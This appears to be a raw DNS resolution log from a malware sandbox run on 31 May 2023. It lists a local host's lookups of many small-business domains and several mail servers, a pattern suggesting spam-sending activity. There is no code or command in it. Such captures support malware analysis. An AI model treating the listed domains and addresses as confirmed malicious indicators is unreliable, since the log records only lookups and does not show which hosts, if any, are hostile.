                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:06.895890951 CEST8.8.8.8192.168.2.30x7186No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:07.039948940 CEST8.8.8.8192.168.2.30x298aName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:07.079783916 CEST8.8.8.8192.168.2.30x4fa3Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:08.701453924 CEST8.8.8.8192.168.2.30xbb4cName error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:10.298213005 CEST8.8.8.8192.168.2.30xb145Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:11.348232031 CEST8.8.8.8192.168.2.30x1ee4No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:11.348232031 CEST8.8.8.8192.168.2.30x1ee4No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:11.689385891 CEST8.8.8.8192.168.2.30x4838No error (0)gmail-smtp-in.l.google.com142.250.153.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.041692972 CEST8.8.8.8192.168.2.30x99aNo error (0)www.fnsds.orgcomingsoon.namebright.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.041692972 CEST8.8.8.8192.168.2.30x99aNo error (0)comingsoon.namebright.comcdl-lb-1356093980.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.041692972 CEST8.8.8.8192.168.2.30x99aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.228.163.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:12.041692972 CEST8.8.8.8192.168.2.30x99aNo error (0)cdl-lb-1356093980.us-east-1.elb.amazonaws.com34.197.121.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.026524067 CEST8.8.8.8192.168.2.30xa3f2No error (0)www.pohlfood.compohlfood.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.026524067 CEST8.8.8.8192.168.2.30xa3f2No error (0)pohlfood.com104.218.10.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.105493069 CEST8.8.8.8192.168.2.30x374bName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:13.203519106 CEST8.8.8.8192.168.2.30xe561No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.608781099 CEST8.8.8.8192.168.2.30xa84cNo error (0)www.11tochi.net157.112.176.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.713398933 CEST8.8.8.8192.168.2.30xe99No error (0)www.tyrns.com62.75.216.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.816237926 CEST8.8.8.8192.168.2.30xe440No error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.816237926 CEST8.8.8.8192.168.2.30xe440No error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.830859900 CEST8.8.8.8192.168.2.30x542eNo error (0)www.reglera.comreglera.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:14.830859900 CEST8.8.8.8192.168.2.30x542eNo error (0)reglera.com64.125.133.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.546838999 CEST8.8.8.8192.168.2.30xd947No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.546838999 CEST8.8.8.8192.168.2.30xd947No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.589462042 CEST8.8.8.8192.168.2.30xe736No error (0)www.spanesi.com5.196.166.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.799252033 CEST8.8.8.8192.168.2.30xd577No error (0)www.tc17.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.799252033 CEST8.8.8.8192.168.2.30xd577No error (0)www.tc17.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:15.851111889 CEST8.8.8.8192.168.2.30x3420No error (0)www.usadig.com198.100.146.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:17.380819082 CEST8.8.8.8192.168.2.30xb893No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:18.369662046 CEST8.8.8.8192.168.2.30x33d0Name error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:18.864690065 CEST8.8.8.8192.168.2.30xf6c3No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:18.864690065 CEST8.8.8.8192.168.2.30xf6c3No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:19.742120028 CEST8.8.8.8192.168.2.30x2098No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:19.742120028 CEST8.8.8.8192.168.2.30x2098No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.288585901 CEST8.8.8.8192.168.2.30x8589No error (0)www.ex-olive.com210.140.73.39A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.590903044 CEST8.8.8.8192.168.2.30xdb1aNo error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.598807096 CEST8.8.8.8192.168.2.30xb89aNo error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.598807096 CEST8.8.8.8192.168.2.30xb89aNo error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.604013920 CEST8.8.8.8192.168.2.30x186aName error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:20.646538019 CEST8.8.8.8192.168.2.30xf4afServer failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:22.307218075 CEST8.8.8.8192.168.2.30xfc68Name error (3)www.owsports.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:23.407995939 CEST8.8.8.8192.168.2.30x4811Name error (3)www.jroy.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.792104959 CEST8.8.8.8192.168.2.30x8e03No error (0)jabian.com104.26.7.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.792104959 CEST8.8.8.8192.168.2.30x8e03No error (0)jabian.com172.67.71.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.792104959 CEST8.8.8.8192.168.2.30x8e03No error (0)jabian.com104.26.6.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.801403999 CEST8.8.8.8192.168.2.30xed74No error (0)nme.co.jp203.0.113.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.819140911 CEST8.8.8.8192.168.2.30x8047Name error (3)agitz.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.843909979 CEST8.8.8.8192.168.2.30xc664No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.843909979 CEST8.8.8.8192.168.2.30xc664No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.875818968 CEST8.8.8.8192.168.2.30x9b35No error (0)araax.comtraff-2.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.875818968 CEST8.8.8.8192.168.2.30x9b35No error (0)traff-2.hugedomains.comhdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.875818968 CEST8.8.8.8192.168.2.30x9b35No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.204.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.875818968 CEST8.8.8.8192.168.2.30x9b35No error (0)hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com3.130.253.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.959750891 CEST8.8.8.8192.168.2.30x1086No error (0)smtp.live.coma-0010.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.964375973 CEST8.8.8.8192.168.2.30x2c11No error (0)vfcindia.com103.191.209.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:24.994366884 CEST8.8.8.8192.168.2.30xf057Server failure (2)awfraser.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.019639969 CEST8.8.8.8192.168.2.30x450cNo error (0)www.synetik.netsynetik.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.019639969 CEST8.8.8.8192.168.2.30x450cNo error (0)synetik.net193.166.255.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.038507938 CEST8.8.8.8192.168.2.30xf4b8No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.038507938 CEST8.8.8.8192.168.2.30xf4b8No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.038507938 CEST8.8.8.8192.168.2.30xf4b8No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.098249912 CEST8.8.8.8192.168.2.30x982No error (0)yasuma.com61.200.81.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.146569014 CEST8.8.8.8192.168.2.30x8386No error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.146569014 CEST8.8.8.8192.168.2.30x8386No error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.194446087 CEST8.8.8.8192.168.2.30x563eNo error (0)xsui.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.205584049 CEST8.8.8.8192.168.2.30xfc5No error (0)siongann.com104.21.8.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.205584049 CEST8.8.8.8192.168.2.30xfc5No error (0)siongann.com172.67.156.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.207340956 CEST8.8.8.8192.168.2.30xfad3No error (0)icd-host.com192.252.159.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.207340956 CEST8.8.8.8192.168.2.30xfad3No error (0)icd-host.com192.252.159.165A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.219242096 CEST8.8.8.8192.168.2.30x328fNo error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.221054077 CEST8.8.8.8192.168.2.30x67d1No error (0)hes.pt52.19.230.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.225366116 CEST8.8.8.8192.168.2.30xbef1No error (0)camamat.com104.21.235.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.225366116 CEST8.8.8.8192.168.2.30xbef1No error (0)camamat.com104.21.235.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.234137058 CEST8.8.8.8192.168.2.30x1b2bNo error (0)htsmx.net63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.245342970 CEST8.8.8.8192.168.2.30x9b45No error (0)doggybag.org213.186.33.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.261657953 CEST8.8.8.8192.168.2.30x8841No error (0)gmail-smtp-in.l.google.com142.250.153.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.294342041 CEST8.8.8.8192.168.2.30x7e4fNo error (0)s5w.com192.99.226.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.305193901 CEST8.8.8.8192.168.2.30x4284No error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.305193901 CEST8.8.8.8192.168.2.30x4284No error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.306983948 CEST8.8.8.8192.168.2.30x6b5aNo error (0)bigzz.by178.249.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.343451023 CEST8.8.8.8192.168.2.30x5478No error (0)pccj.net104.21.29.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.343451023 CEST8.8.8.8192.168.2.30x5478No error (0)pccj.net172.67.148.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.347227097 CEST8.8.8.8192.168.2.30x7307No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.354264021 CEST8.8.8.8192.168.2.30xe009No error (0)x96.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.354264021 CEST8.8.8.8192.168.2.30xe009No error (0)x96.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.362318039 CEST8.8.8.8192.168.2.30x9cbfNo error (0)univi.it18.197.121.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.363605976 CEST8.8.8.8192.168.2.30x4305No error (0)captlfix.com198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.363605976 CEST8.8.8.8192.168.2.30x4305No error (0)captlfix.com198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.363605976 CEST8.8.8.8192.168.2.30x4305No error (0)captlfix.com198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.363605976 CEST8.8.8.8192.168.2.30x4305No error (0)captlfix.com198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.370242119 CEST8.8.8.8192.168.2.30x63dNo error (0)willsub.com69.89.107.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.220A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.385912895 CEST8.8.8.8192.168.2.30xede6No error (0)in1.smtp.messagingengine.com103.168.172.219A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.412420034 CEST8.8.8.8192.168.2.30x7b17No error (0)mackusick.com217.160.0.179A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.444016933 CEST8.8.8.8192.168.2.30x118fNo error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.448124886 CEST8.8.8.8192.168.2.30xbc16No error (0)sinwal.com188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.448124886 CEST8.8.8.8192.168.2.30xbc16No error (0)sinwal.com188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.554622889 CEST8.8.8.8192.168.2.30x7263No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.576997995 CEST8.8.8.8192.168.2.30x6236No error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.577641010 CEST8.8.8.8192.168.2.30x3851No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.628328085 CEST8.8.8.8192.168.2.30x3e6eNo error (0)burstner.ru62.122.170.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.734463930 CEST8.8.8.8192.168.2.30xf0beName error (3)www.udesign.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.739192009 CEST8.8.8.8192.168.2.30x101fName error (3)mail7.digitalwaves.co.nznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.754180908 CEST8.8.8.8192.168.2.30xd235No error (0)www.gpthink.com39.99.233.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.754939079 CEST8.8.8.8192.168.2.30x114aNo error (0)hamaker.net34.102.136.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.844816923 CEST8.8.8.8192.168.2.30xf4f4No error (0)keio-web.com219.94.128.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.848385096 CEST8.8.8.8192.168.2.30x1b4dNo error (0)dwid.de87.230.93.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.948227882 CEST8.8.8.8192.168.2.30x78e9No error (0)kayoaiba.com154.213.117.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:25.959732056 CEST8.8.8.8192.168.2.30xeddbName error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.006083012 CEST8.8.8.8192.168.2.30x60f4No error (0)dspears.comtraff-5.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.006083012 CEST8.8.8.8192.168.2.30x60f4No error (0)traff-5.hugedomains.comhdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.006083012 CEST8.8.8.8192.168.2.30x60f4No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com34.205.242.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.006083012 CEST8.8.8.8192.168.2.30x60f4No error (0)hdr-nlb7-aebd5d615260636b.elb.us-east-1.amazonaws.com54.161.222.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.013015985 CEST8.8.8.8192.168.2.30xd7b7No error (0)kevyt.net172.67.129.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.013015985 CEST8.8.8.8192.168.2.30xd7b7No error (0)kevyt.net104.21.2.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.118360043 CEST8.8.8.8192.168.2.30xe9f7Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.137753010 CEST8.8.8.8192.168.2.30xd03aNo error (0)603888.comnum6.17986.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.137753010 CEST8.8.8.8192.168.2.30xd03aNo error (0)num6.17986.net67.21.93.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.157562971 CEST8.8.8.8192.168.2.30x8802Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.239243031 CEST8.8.8.8192.168.2.30x7ecfNo error (0)bosado.com5.39.75.157A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.239626884 CEST8.8.8.8192.168.2.30xe442No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.350109100 CEST8.8.8.8192.168.2.30x6a44No error (0)bount.com.tw188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.350109100 CEST8.8.8.8192.168.2.30x6a44No error (0)bount.com.tw188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.429181099 CEST8.8.8.8192.168.2.30x324dNo error (0)iranytu.net103.224.212.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.523705006 CEST8.8.8.8192.168.2.30xfd3No error (0)wvs-net.de188.114.97.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.523705006 CEST8.8.8.8192.168.2.30xfd3No error (0)wvs-net.de188.114.96.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.528667927 CEST8.8.8.8192.168.2.30x4ad2No error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.532315016 CEST8.8.8.8192.168.2.30xcf4aNo error (0)fifa-ews.com172.67.189.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.532315016 CEST8.8.8.8192.168.2.30xcf4aNo error (0)fifa-ews.com104.21.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.532459021 CEST8.8.8.8192.168.2.30x3a79Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.546196938 CEST8.8.8.8192.168.2.30x6dd2No error (0)agulatex.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.555963039 CEST8.8.8.8192.168.2.30xff78No error (0)touchfam.ca15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.555963039 CEST8.8.8.8192.168.2.30xff78No error (0)touchfam.ca3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563035965 CEST8.8.8.8192.168.2.30xfabcNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563035965 CEST8.8.8.8192.168.2.30xfabcNo error (0)cjborden.com3.33.152.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563710928 CEST8.8.8.8192.168.2.30xa8dfNo error (0)mxs.mail.ru217.69.139.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563710928 CEST8.8.8.8192.168.2.30xa8dfNo error (0)mxs.mail.ru94.100.180.31A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563780069 CEST8.8.8.8192.168.2.30x5273No error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563780069 CEST8.8.8.8192.168.2.30x5273No error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563780069 CEST8.8.8.8192.168.2.30x5273No error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.563780069 CEST8.8.8.8192.168.2.30x5273No error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.591027975 CEST8.8.8.8192.168.2.30xa0e7No error (0)pertex.com185.151.30.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.653047085 CEST8.8.8.8192.168.2.30x46a9No error (0)alt4.gmail-smtp-in.l.google.com173.194.202.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.803045034 CEST8.8.8.8192.168.2.30xd07No error (0)ikulani.com157.7.107.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:26.859149933 CEST8.8.8.8192.168.2.30xa1b6No error (0)listel.co.jp49.212.243.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.037018061 CEST8.8.8.8192.168.2.30xf6aaNo error (0)banvari.com23.227.38.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.095221043 CEST8.8.8.8192.168.2.30x8d68No error (0)gmail-smtp-in.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.170543909 CEST8.8.8.8192.168.2.30x2f1No error (0)skypearl.com153.122.170.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.217390060 CEST8.8.8.8192.168.2.30x50c2No error (0)metaforacom.com185.42.105.162A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.228657961 CEST8.8.8.8192.168.2.30xe799No error (0)mikihan.com153.126.211.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.231128931 CEST8.8.8.8192.168.2.30x1d8eNo error (0)in1.smtp.messagingengine.com103.168.172.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.231128931 CEST8.8.8.8192.168.2.30x1d8eNo error (0)in1.smtp.messagingengine.com103.168.172.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.231128931 CEST8.8.8.8192.168.2.30x1d8eNo error (0)in1.smtp.messagingengine.com103.168.172.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        May 31, 2023 14:51:27.231128931 CEST8.8.8.8192.168.2.30x1d8eNo error (0)in1.smtp.messagingengine.com103.168.172.217A (IP address)IN (0x0001)false
